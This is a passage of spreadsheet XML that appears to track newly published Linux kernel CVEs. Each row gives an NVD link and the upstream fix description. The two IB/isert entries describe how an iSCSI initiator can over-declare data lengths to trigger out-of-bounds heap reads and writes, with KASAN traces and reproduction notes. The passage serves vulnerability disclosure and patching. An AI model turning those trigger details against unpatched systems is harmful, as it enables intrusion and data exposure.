          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q772" s="5" t="inlineStr"/>
      <c r="R772" s="5" t="inlineStr"/>
      <c r="S772" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/chrome: cros_ec_debugfs: Unregister panic notifier
cros_ec_debugfs_probe() registers notifier_panic with the EC panic
notifier chain. The remove path tears down debugfs and the console log,
but leaves the notifier registered. A later panic notification can call
back into the removed instance and queue work that accesses released
data.
Unregister the panic notifier before tearing down the debugfs and
console log state.
This issue was found by a static analysis tool.</t>
        </is>
      </c>
      <c r="T772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90404</t>
        </is>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B773" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90405</t>
        </is>
      </c>
      <c r="D773" s="5" t="inlineStr"/>
      <c r="E773" s="5" t="inlineStr"/>
      <c r="F773" s="5" t="inlineStr"/>
      <c r="G773" s="5" t="inlineStr"/>
      <c r="H773" s="5" t="inlineStr"/>
      <c r="I773" s="5" t="inlineStr"/>
      <c r="J773" s="5" t="inlineStr"/>
      <c r="K773" s="5" t="inlineStr"/>
      <c r="L773" s="5" t="inlineStr"/>
      <c r="M773" s="5" t="inlineStr"/>
      <c r="N773" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O773" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P773" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q773" s="5" t="inlineStr"/>
      <c r="R773" s="5" t="inlineStr"/>
      <c r="S773" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: stm32: dcmi: fix some error handling bugs in probe()
There are a few issues here:
1) After we assign:
        chan = dma_request_chan(&amp;pdev-&gt;dev, "tx");
   Then the error paths need to clean up before returning.  The first
   error path does a direct return.
2) The error paths check "dcmi-&gt;mdma_chan" but that is not assigned
   until later so it results in memory leaks.  Test "mdma_chan"
   instead.
3) The error handling calls dma_release_channel(dcmi-&gt;dma_chan) before
   "dcmi-&gt;dma_chan" has been assigned which leads to a NULL pointer
   dereference.  Use the "chan" variable instead.
I also moved the call to dma_release_channel() after the call to
dma_release_channel() so it mirrors the allocation code better.</t>
        </is>
      </c>
      <c r="T773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90405</t>
        </is>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B774" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90406</t>
        </is>
      </c>
      <c r="D774" s="5" t="inlineStr"/>
      <c r="E774" s="5" t="inlineStr"/>
      <c r="F774" s="5" t="inlineStr"/>
      <c r="G774" s="5" t="inlineStr"/>
      <c r="H774" s="5" t="inlineStr"/>
      <c r="I774" s="5" t="inlineStr"/>
      <c r="J774" s="5" t="inlineStr"/>
      <c r="K774" s="5" t="inlineStr"/>
      <c r="L774" s="5" t="inlineStr"/>
      <c r="M774" s="5" t="inlineStr"/>
      <c r="N774" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O774" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P774" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q774" s="5" t="inlineStr"/>
      <c r="R774" s="5" t="inlineStr"/>
      <c r="S774" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: qcom: iris: handle runtime PM resume failure in core deinit
Check the return value of pm_runtime_resume_and_get() in
iris_core_deinit().
If runtime PM resume fails, skip hardware power-off operations but
still perform software teardown and state transition. Also skip the
corresponding pm_runtime_put_sync() call to avoid unbalanced runtime
PM references.</t>
        </is>
      </c>
      <c r="T774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90406</t>
        </is>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B775" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90407</t>
        </is>
      </c>
      <c r="D775" s="5" t="inlineStr"/>
      <c r="E775" s="5" t="inlineStr"/>
      <c r="F775" s="5" t="inlineStr"/>
      <c r="G775" s="5" t="inlineStr"/>
      <c r="H775" s="5" t="inlineStr"/>
      <c r="I775" s="5" t="inlineStr"/>
      <c r="J775" s="5" t="inlineStr"/>
      <c r="K775" s="5" t="inlineStr"/>
      <c r="L775" s="5" t="inlineStr"/>
      <c r="M775" s="5" t="inlineStr"/>
      <c r="N775" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O775" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P775" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q775" s="5" t="inlineStr"/>
      <c r="R775" s="5" t="inlineStr"/>
      <c r="S775" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath11k: fix overreads in ath11k_wmi_process_csa_switch_count_event()
There is no policy entry for WMI_TAG_PDEV_CSA_SWITCH_COUNT_STATUS_EVENT, so
the parse infrastructure does not enforce a minimum length for the event
struct. Additionally, the num_vdevs field is taken directly from firmware
and used as a loop bound over the vdev_ids array without checking that it
fits within the TLV payload. Either condition can cause an out-of-bounds
read.
Add a TLV policy entry for WMI_TAG_PDEV_CSA_SWITCH_COUNT_STATUS_EVENT so
the parse infrastructure enforces a minimum length for the fixed-size event
struct. Add a helper ath11k_wmi_tlv_data_len() to recover the payload
length of a parsed TLV from the header preceding its data pointer. Use it
in ath11k_wmi_process_csa_switch_count_event() to bound num_vdevs before
the loop.
Compile tested only.</t>
        </is>
      </c>
      <c r="T775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90407</t>
        </is>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B776" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90408</t>
        </is>
      </c>
      <c r="D776" s="5" t="inlineStr"/>
      <c r="E776" s="5" t="inlineStr"/>
      <c r="F776" s="5" t="inlineStr"/>
      <c r="G776" s="5" t="inlineStr"/>
      <c r="H776" s="5" t="inlineStr"/>
      <c r="I776" s="5" t="inlineStr"/>
      <c r="J776" s="5" t="inlineStr"/>
      <c r="K776" s="5" t="inlineStr"/>
      <c r="L776" s="5" t="inlineStr"/>
      <c r="M776" s="5" t="inlineStr"/>
      <c r="N776" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O776" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P776" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q776" s="5" t="inlineStr"/>
      <c r="R776" s="5" t="inlineStr"/>
      <c r="S776" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath12k: fix overreads in ath12k_wmi_process_csa_switch_count_event()
There is no policy entry for WMI_TAG_PDEV_CSA_SWITCH_COUNT_STATUS_EVENT, so
the parse infrastructure does not enforce a minimum length for the event
struct. Additionally, the num_vdevs field is taken directly from firmware
and used as a loop bound over the vdev_ids array without checking that it
fits within the TLV payload. Either condition can cause an out-of-bounds
read.
Add a TLV policy entry for WMI_TAG_PDEV_CSA_SWITCH_COUNT_STATUS_EVENT so
the parse infrastructure enforces a minimum length for the fixed-size event
struct. Add a helper ath12k_wmi_tlv_data_len() to recover the payload
length of a parsed TLV from the header preceding its data pointer. Use it
in ath12k_wmi_process_csa_switch_count_event() to bound num_vdevs before
the loop.
Compile tested only.</t>
        </is>
      </c>
      <c r="T776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90408</t>
        </is>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B777" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90409</t>
        </is>
      </c>
      <c r="D777" s="5" t="inlineStr"/>
      <c r="E777" s="5" t="inlineStr"/>
      <c r="F777" s="5" t="inlineStr"/>
      <c r="G777" s="5" t="inlineStr"/>
      <c r="H777" s="5" t="inlineStr"/>
      <c r="I777" s="5" t="inlineStr"/>
      <c r="J777" s="5" t="inlineStr"/>
      <c r="K777" s="5" t="inlineStr"/>
      <c r="L777" s="5" t="inlineStr"/>
      <c r="M777" s="5" t="inlineStr"/>
      <c r="N777" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O777" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P777" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q777" s="5" t="inlineStr"/>
      <c r="R777" s="5" t="inlineStr"/>
      <c r="S777" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/panthor: Add vm_bind region with kbo range overlap check
When a VM is created, caller has to specify the range of the address space
carve-out set aside for mapping kernel BO's. That means vm_bind mappings of
UM-exposed BO's should not intersect with that region, but at the moment
we're not checking this.
At first, I thought of giving these values to drm_gpuvm_init() through its
reserve_{offset, range} arguments, but it turns out that is meant for VM
address spans that are not managed through the usual drm_gpuvm split/merge
circuit, so storing the end of the user VA range at VM creation time and
doing a quick check in the vm_bind ioctl path was the simplest workaround.
The new check also makes sure vm_bind range doesn't overflow the size of a
64-bit unsigned integer. That was already being done further down the call
stack inside drm_gpuvm_sm_map -&gt; drm_gpuvm_range_valid, but it's best to
fail early in the driver before GPUVM functions are invoked so that we
won't waste time allocating vm_bind context resources.</t>
        </is>
      </c>
      <c r="T777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90409</t>
        </is>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B778" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90410</t>
        </is>
      </c>
      <c r="D778" s="5" t="inlineStr"/>
      <c r="E778" s="5" t="inlineStr"/>
      <c r="F778" s="5" t="inlineStr"/>
      <c r="G778" s="5" t="inlineStr"/>
      <c r="H778" s="5" t="inlineStr"/>
      <c r="I778" s="5" t="inlineStr"/>
      <c r="J778" s="5" t="inlineStr"/>
      <c r="K778" s="5" t="inlineStr"/>
      <c r="L778" s="5" t="inlineStr"/>
      <c r="M778" s="5" t="inlineStr"/>
      <c r="N778" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O778" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P778" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q778" s="5" t="inlineStr"/>
      <c r="R778" s="5" t="inlineStr"/>
      <c r="S778" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
spi: davinci: switch to managed controller allocation
The controller is allocated with the non-managed spi_alloc_host() while
the interrupt is registered with devm_request_threaded_irq().  During
removal, spi_bitbang_stop() only unregisters the controller; the
subsequent spi_controller_put() then frees the controller together with
its embedded davinci_spi devdata, which is the IRQ handler's dev_id.
The devm_request_threaded_irq() release action (free_irq()), which
drains the handler, does not run until after .remove() returns.  A late
or latched interrupt can therefore reach davinci_spi_irq() and
dereference already-freed memory.
Switch to devm_spi_alloc_host() so that the devres LIFO order releases
the controller only after free_irq() has drained the handler, and drop
the now-redundant spi_controller_put() from .remove().  The probe error
path is simplified to direct returns.
The clock is acquired with devm_clk_get_enabled(), which is registered
after the IRQ and thus released before it by the devres LIFO order.
Drain the interrupt explicitly with devm_free_irq() before disabling the
controller so that a late interrupt cannot access the registers of a
clock-gated controller.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="T778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90410</t>
        </is>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B779" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90411</t>
        </is>
      </c>
      <c r="D779" s="5" t="inlineStr"/>
      <c r="E779" s="5" t="inlineStr"/>
      <c r="F779" s="5" t="inlineStr"/>
      <c r="G779" s="5" t="inlineStr"/>
      <c r="H779" s="5" t="inlineStr"/>
      <c r="I779" s="5" t="inlineStr"/>
      <c r="J779" s="5" t="inlineStr"/>
      <c r="K779" s="5" t="inlineStr"/>
      <c r="L779" s="5" t="inlineStr"/>
      <c r="M779" s="5" t="inlineStr"/>
      <c r="N779" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O779" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P779" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q779" s="5" t="inlineStr"/>
      <c r="R779" s="5" t="inlineStr"/>
      <c r="S779" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-fc: unmap cmd_iu DMA on rsp_iu mapping failure in init_request
__nvme_fc_init_request() maps cmd_iu and then rsp_iu for DMA. If the
rsp_iu mapping fails, the original code only recorded the error and fell
through: it left the already-mapped cmd_iu unmapped and still marked the
op as FCPOP_STATE_IDLE before returning. Since blk-mq does not call
.exit_request() when .init_request() fails, the cmd_iu mapping is leaked
for every op whose rsp_iu mapping fails.
Jump to an error path on rsp_iu mapping failure that unmaps cmd_iu and
returns the error without marking the op idle, so it stays in the
FCPOP_STATE_UNINIT state set by the initial memset().</t>
        </is>
      </c>
      <c r="T779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90411</t>
        </is>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B780" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90412</t>
        </is>
      </c>
      <c r="D780" s="5" t="inlineStr"/>
      <c r="E780" s="5" t="inlineStr"/>
      <c r="F780" s="5" t="inlineStr"/>
      <c r="G780" s="5" t="inlineStr"/>
      <c r="H780" s="5" t="inlineStr"/>
      <c r="I780" s="5" t="inlineStr"/>
      <c r="J780" s="5" t="inlineStr"/>
      <c r="K780" s="5" t="inlineStr"/>
      <c r="L780" s="5" t="inlineStr"/>
      <c r="M780" s="5" t="inlineStr"/>
      <c r="N780" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O780" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P780" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q780" s="5" t="inlineStr"/>
      <c r="R780" s="5" t="inlineStr"/>
      <c r="S780" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet: fix return status of RMI log page on allocation failure
nvmet_execute_get_log_page_rmi() leaves 'status' holding NVME_SC_SUCCESS
(set by the successful nvmet_req_find_ns() call) when the kzalloc() for
the log buffer fails. It then jumps to the out label and completes the
request with a success status, so the host is told the command succeeded
while no data was transferred.
Initialize 'status' to NVME_SC_INTERNAL, matching the smart log handler,
so an allocation failure is reported as an internal error.</t>
        </is>
      </c>
      <c r="T780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90412</t>
        </is>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B781" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90413</t>
        </is>
      </c>
      <c r="D781" s="5" t="inlineStr"/>
      <c r="E781" s="5" t="inlineStr"/>
      <c r="F781" s="5" t="inlineStr"/>
      <c r="G781" s="5" t="inlineStr"/>
      <c r="H781" s="5" t="inlineStr"/>
      <c r="I781" s="5" t="inlineStr"/>
      <c r="J781" s="5" t="inlineStr"/>
      <c r="K781" s="5" t="inlineStr"/>
      <c r="L781" s="5" t="inlineStr"/>
      <c r="M781" s="5" t="inlineStr"/>
      <c r="N781" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O781" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P781" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q781" s="5" t="inlineStr"/>
      <c r="R781" s="5" t="inlineStr"/>
      <c r="S781" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
IB/isert: reject login PDUs declaring more data than was received
isert_login_recv_done() records how many bytes the HCA actually placed in
the login buffer, but nothing compares that against the length the login
PDU's BHS declares.  isert_rx_login_req() copies min(login_req_len,
MAX_KEY_VALUE_PAIRS) bytes into login-&gt;req_buf, and the login code then
reads the declared length back out of that buffer - for the first PDU in
iscsi_target_locate_portal(),
	payload_length = ntoh24(login_req-&gt;dlength);
	tmpbuf = kmemdup_nul(login-&gt;req_buf, payload_length, GFP_KERNEL);
and for the ones after it in iscsi_decode_text_input(), reached from
iscsi_target_do_login().
login-&gt;req_buf is a fixed MAX_KEY_VALUE_PAIRS (8192) byte allocation, so
an initiator that declares more than it sends reads off the end of it,
before authentication and with the length under its control:
  BUG: KASAN: slab-out-of-bounds in kmemdup_nul+0x43/0x80
  Read of size 8193 at addr ffff8881056a8000 by task iscsi_np/167
   __asan_memcpy+0x23/0x60
   kmemdup_nul+0x43/0x80
   iscsi_target_locate_portal+0x48d/0x1180
   iscsi_target_login_thread+0x19a9/0x3350
  Allocated by task 167:
   __kmalloc_cache_noprof+0x158/0x370
   iscsi_target_login_thread+0x971/0x3350
  which belongs to the cache kmalloc-8k of size 8192
  allocated 8192-byte region
Falsifying the second login PDU instead reaches the other reader, on the
same buffer:
  BUG: KASAN: slab-out-of-bounds in kmemdup_nul+0x43/0x80
  Read of size 8193 at addr ffff888104d10000 by task kworker/1:1/50
  Workqueue: isert_login_wq iscsi_target_do_login_rx
   __asan_memcpy+0x23/0x60
   kmemdup_nul+0x43/0x80
   iscsi_decode_text_input+0xc6/0x11c0
   iscsi_target_do_login+0x261/0x1470
   iscsi_target_do_login_rx+0x51d/0x7d0
iscsit over TCP is not exposed: iscsit_get_login_rx() validates the
declared length with iscsi_target_check_login_request() and then reads
exactly that many bytes off the socket, so the declared length governs
how much arrives rather than how much is copied out of an already-filled
buffer.  isert does not call iscsi_target_check_login_request() at all.
Reject a login PDU whose declared DataSegmentLength exceeds what was
received, in both paths that reach isert_rx_login_req():
isert_get_login_rx() for the first login PDU and isert_login_recv_done()
for the ones after it.  dlength &lt;= login_req_len is allowed because the
received count can include up to three bytes of iSCSI padding.
Once the check is in place the copy out can no longer exceed the copy in:
the posted login SGE is ISER_RX_PAYLOAD_SIZE, so login_req_len cannot
exceed MAX_KEY_VALUE_PAIRS and the min() in isert_rx_login_req() is
login_req_len.
Like the existing short-PDU check added by 29e7b925ae6d, the reject in
isert_login_recv_done() returns without completing login_req_comp, so a
malformed subsequent PDU leaves the login to be torn down by the login
timer rather than failing immediately.  The first-PDU path returns an
error and fails straight away.
Reproduced on 7.2.0-rc4 with soft-RoCE (rdma_rxe) under KASAN, using an
initiator that sends the real key=value payload while declaring 8193 in
the BHS, on the first login PDU and on the second in separate runs.  The
reported read size tracks the declared value exactly; 16384 and 61440
behave the same.  Unpatched 3 of 3 runs report on each of the two paths,
patched 0 of 3 on both, run alternately in a single session, and a normal
login still completes on the patched build.</t>
        </is>
      </c>
      <c r="T781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90413</t>
        </is>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B782" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90414</t>
        </is>
      </c>
      <c r="D782" s="5" t="inlineStr"/>
      <c r="E782" s="5" t="inlineStr"/>
      <c r="F782" s="5" t="inlineStr"/>
      <c r="G782" s="5" t="inlineStr"/>
      <c r="H782" s="5" t="inlineStr"/>
      <c r="I782" s="5" t="inlineStr"/>
      <c r="J782" s="5" t="inlineStr"/>
      <c r="K782" s="5" t="inlineStr"/>
      <c r="L782" s="5" t="inlineStr"/>
      <c r="M782" s="5" t="inlineStr"/>
      <c r="N782" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O782" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P782" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q782" s="5" t="inlineStr"/>
      <c r="R782" s="5" t="inlineStr"/>
      <c r="S782" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
IB/isert: reject PDUs declaring more data than was received
isert_recv_done() hands each received PDU to the opcode handlers without
ever looking at wc-&gt;byte_len, the number of bytes the HCA actually placed
in the receive descriptor. The handlers then copy that many bytes - the
data-segment length the initiator declared in the BHS
(ntoh24(hdr-&gt;dlength), via the derived unsol_data_len / imm_data_len) -
out of the fixed-size descriptor:
  isert_handle_iscsi_dataout():
        sg_copy_from_buffer(sg_start, sg_nents, isert_get_data(rx_desc),
                            unsol_data_len);
  isert_handle_scsi_cmd():
        sg_copy_from_buffer(cmd-&gt;se_cmd.t_data_sg, sg_nents,
                            isert_get_data(rx_desc), imm_data_len);
Because the declared length is never checked against wc-&gt;byte_len, an
initiator can declare a data segment larger than the bytes it actually
sent (and larger than the descriptor) and cause an out-of-bounds read of
the receive buffer.
Nothing upstream of isert closes this door:
  - __iscsit_check_dataout_hdr() bounds the inbound payload against
    conn_ops-&gt;MaxXmitDataSegmentLength (MXDSL) - a transmit parameter,
    used here for the inbound check.
  - iscsi_set_connection_parameters() sets
    ops-&gt;MaxXmitDataSegmentLength = ops-&gt;TargetRecvDataSegmentLength;
    and TARGETRECVDATASEGMENTLENGTH is absent from the min()-clamp list in
    iscsi_check_acceptor_state(), so the value the initiator declares is
    adopted verbatim (type range 512..16777215). The initiator effectively
    raises its own ceiling.
  - isert never clamps the negotiated value to its own fixed receive
    descriptor (ISER_RX_SIZE, 9216 bytes), so the target core's bound and
    the descriptor size are unrelated.
The imm_data_len == data_len path is more than an over-read: it aliases
the receive descriptor via sg_set_buf() and passes it to the backend as
the data source for the SCSI WRITE, so an over-declared length causes heap
contents past the descriptor to be written through the backend to the
backing store. The backend is the victim of the oversized scatterlist
isert hands it, not the cause; no read-back of the written bytes was
demonstrated.
Trigger: after login completes (full feature phase), an initiator that has
declared a large TargetRecvDataSegmentLength and a FirstBurstLength that
permits unsolicited/immediate data sends a PDU whose declared data-segment
length exceeds what was received. With KASAN:
  BUG: KASAN: slab-out-of-bounds in sg_copy_buffer+0x150/0x1c0
  Read of size 4096 at addr ffff888109720800 by task kworker/1:0H/25
  Workqueue: ib-comp-wq ib_cq_poll_work
  Call Trace:
   sg_copy_buffer+0x150/0x1c0
   isert_recv_done+0xba6/0x2390
   __ib_process_cq+0xe1/0x390
   ib_cq_poll_work+0x46/0x150
isert_recv_done+0xba6 resolves to isert_handle_iscsi_dataout()
(ib_isert.c:1160), inlined through isert_rx_opcode().
Validate wc-&gt;byte_len against the framing in isert_recv_done() before the
PDU reaches any handler, and reinstate the connection if it is short.
Because the test compares without subtracting the header length, it also
rejects PDUs shorter than the iSER and iSCSI headers, which would otherwise
be parsed out of stale descriptor contents. The login handler rejects PDUs
shorter than ISER_HEADERS_LEN (commit 29e7b925ae6d ("IB/isert: Reject login
PDUs shorter than ISER_HEADERS_LEN")) but does not bound the declared
length either; that is fixed in the next patch. The data handlers had no
length check at all.
isert reads the data segment from a fixed offset: isert_get_data()
returns the iSER header plus ISER_HEADERS_LEN and makes no adjustment for
an AHS.  The bytes the handlers touch are therefore exactly
[ISER_HEADERS_LEN, ISER_HEADERS_LEN + dlength), and comparing that sum
against wc-&gt;byte_len bounds precisely the region that is read.  An AHS
term would only make the test stricter without bounding anything furth
---truncated---</t>
        </is>
      </c>
      <c r="T782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90414</t>
        </is>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B783" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90415</t>
        </is>
      </c>
      <c r="D783" s="5" t="inlineStr"/>
      <c r="E783" s="5" t="inlineStr"/>
      <c r="F783" s="5" t="inlineStr"/>
      <c r="G783" s="5" t="inlineStr"/>
      <c r="H783" s="5" t="inlineStr"/>
      <c r="I783" s="5" t="inlineStr"/>
      <c r="J783" s="5" t="inlineStr"/>
      <c r="K783" s="5" t="inlineStr"/>
      <c r="L783" s="5" t="inlineStr"/>
      <c r="M783" s="5" t="inlineStr"/>
      <c r="N783" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O783" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P783" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q783" s="5" t="inlineStr"/>
      <c r="R783" s="5" t="inlineStr"/>
      <c r="S783" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/cxgb4: free STAG index when TPT entry write fails
write_tpt_entry() allocates a new STAG index with c4iw_get_resource() and
bumps stats.stag.cur before programming the entry.  When
write_adapter_mem() fails, it returns the error without releasing the index
or reversing the statistic.  No MR is inserted into rhp-&gt;mrs, so
deregistration never reclaims it, leaking the index until device teardown.
Record whether this call allocated the index and, on a failed write, return
it to tpt_table and decrement stats.stag.cur.  Key the rollback on both the
write error and that flag, not the error alone: a non-reset update carries
a caller-owned STAG that this call did not allocate and must not free.</t>
        </is>
      </c>
      <c r="T783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90415</t>
        </is>
      </c>
    </row>
    <row r="784">
      <c r="A784" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B784" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90416</t>
        </is>
      </c>
      <c r="D784" s="5" t="inlineStr"/>
      <c r="E784" s="5" t="inlineStr"/>
      <c r="F784" s="5" t="inlineStr"/>
      <c r="G784" s="5" t="inlineStr"/>
      <c r="H784" s="5" t="inlineStr"/>
      <c r="I784" s="5" t="inlineStr"/>
      <c r="J784" s="5" t="inlineStr"/>
      <c r="K784" s="5" t="inlineStr"/>
      <c r="L784" s="5" t="inlineStr"/>
      <c r="M784" s="5" t="inlineStr"/>
      <c r="N784" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O784" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P784" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q784" s="5" t="inlineStr"/>
      <c r="R784" s="5" t="inlineStr"/>
      <c r="S784" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/mlx5: Fix stack out-of-bounds read in cc_params debugfs
get_param() reads a congestion parameter as a u32 but formats it with the
signed "%d" into an 11-byte stack buffer. A value with bit 31 set, such as
0x80000000, renders as "-2147483648\n" whose full length is 12. snprintf()
stores only 11 bytes yet returns 12, so simple_read_from_buffer() treats 12
bytes as valid and reads one byte past lbuf[].
